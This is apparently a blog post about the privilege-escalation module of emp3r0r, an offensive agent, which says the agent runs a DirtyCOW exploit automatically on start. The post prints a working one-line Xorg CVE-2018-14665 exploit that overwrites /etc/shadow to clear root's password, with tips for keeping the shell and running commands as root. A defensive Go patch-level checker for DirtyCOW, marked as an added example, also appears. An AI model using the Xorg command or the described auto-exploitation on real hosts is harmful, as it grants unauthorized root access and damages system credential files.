Happy Chinese New Year!
The coronavirus outbreak in Wuhan keeps me from going outside; actually, I have cancelled all travel plans for this holiday. What do I do at home then?
## get_root
This module can help you get root via:
- kernel exploits
- userland LPE exploits, such as exim, sudo
- previously-implemented backdoors
## demo
## exploits
### dirtycow
dirtycow is no doubt the most famous Linux LPE exploit so far; according to Wikipedia, the affected Linux versions include:
| Earliest kernel version fixed | Linux distribution that uses this |
|---|---|
| 3.2.0-113.155 | Ubuntu 12.04 LTS |
| 3.13.0-100.147 | Ubuntu 14.04 LTS (Linux Mint 17.1) |
| 3.16.36-1+deb8u2 | Debian 8 |
| 4.4.0-45.66 | Ubuntu 16.04 LTS |
| 4.8.0-26.28 | Ubuntu 16.10 |
| 3.10.0-327.36.3 | RHEL 7, CentOS 7 |
| 2.6.32-642.6.2 | RHEL 6, CentOS 6 |
| 2.6.18-416 | RHEL 5, CentOS 5 |
| 3.0.101-84.1 | SLES 11 SP4 |
| 3.12.60-52.57.1 | SLES 12 GA LTSS |
| 3.12.62-60.64.8.2 | SLES 12 SP1 |
It's really a long list; you will love this exploit.
I made a version checker from this table, and implemented a Go version of the dirtycow exploit in the emp3r0r agent.
The agent tries to exploit dirtycow upon start when applicable.
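As an added example (not emp3r0r's own code): a patch-level check in Go over the fixed-version table above, the kind of audit a defender runs to tell whether a host's kernel package still lacks the DirtyCOW fix. It compares digit runs only, so distribution suffixes such as `.el7` or `+deb8u2` sort naturally; the distribution labels are assumed, and the input must be the kernel *package* version (from `dpkg`/`rpm`), because `uname -r` does not carry the package revision on every distribution.

```go
package main

import (
	"strconv"
	"strings"
)

// Earliest fixed kernel package version per distribution, from the table above; keys are constructed labels.
var dirtyCowFixed = map[string]string{
	"ubuntu-12.04": "3.2.0-113.155",
	"ubuntu-14.04": "3.13.0-100.147",
	"debian-8":     "3.16.36-1+deb8u2",
	"ubuntu-16.04": "4.4.0-45.66",
	"ubuntu-16.10": "4.8.0-26.28",
	"rhel-7":       "3.10.0-327.36.3",
	"rhel-6":       "2.6.32-642.6.2",
	"rhel-5":       "2.6.18-416",
	"sles-11-sp4":  "3.0.101-84.1",
	"sles-12-ga":   "3.12.60-52.57.1",
	"sles-12-sp1":  "3.12.62-60.64.8.2",
}

// numericParts keeps only the digit runs: "3.10.0-327.36.3.el7" -> [3 10 0 327 36 3 7].
func numericParts(v string) []int {
	var parts []int
	for _, f := range strings.FieldsFunc(v, func(r rune) bool { return r < '0' || r > '9' }) {
		n, _ := strconv.Atoi(f) // fields are pure digits
		parts = append(parts, n)
	}
	return parts
}

// compareVersions is negative, zero or positive like strings.Compare; when one
// version is a prefix of the other (a trailing ".el7" on one side), the longer is newer.
func compareVersions(a, b string) int {
	pa, pb := numericParts(a), numericParts(b)
	for i := 0; i < len(pa) && i < len(pb); i++ {
		if pa[i] != pb[i] {
			return pa[i] - pb[i]
		}
	}
	return len(pa) - len(pb)
}

// PatchedAgainstDirtyCow reports whether the kernel package version is at or above
// the fixed one; known is false for distributions missing from the table.
func PatchedAgainstDirtyCow(distro, kernel string) (patched, known bool) {
	fixed, ok := dirtyCowFixed[distro]
	return ok && compareVersions(kernel, fixed) >= 0, ok
}
```

A `known == false` result means the table has nothing to say about that distribution, which an audit must report separately rather than treat as patched.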
### xorg (CVE-2018-14665)
xorg-server versions 1.19 through 1.20.1 are vulnerable; the exploit is pretty simple:
```bash
cd /etc;Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
```
Several tips:
- the `logfile` path has to be relative, thus `cd` is required
- `fp` means font path; this value will appear in the resulting `logfile` as a single line
- you might want to `kill $!` after the `logfile` is overwritten, otherwise you lose your current TTY to operate on
- `/etc/shadow` gets overwritten with the `logfile`, with one valid line `root::16431:0:99999:7:::`, which clears root's password
- `su` doesn't ask for a password if there's no password; use `su -c <command>` to execute an arbitrary command as root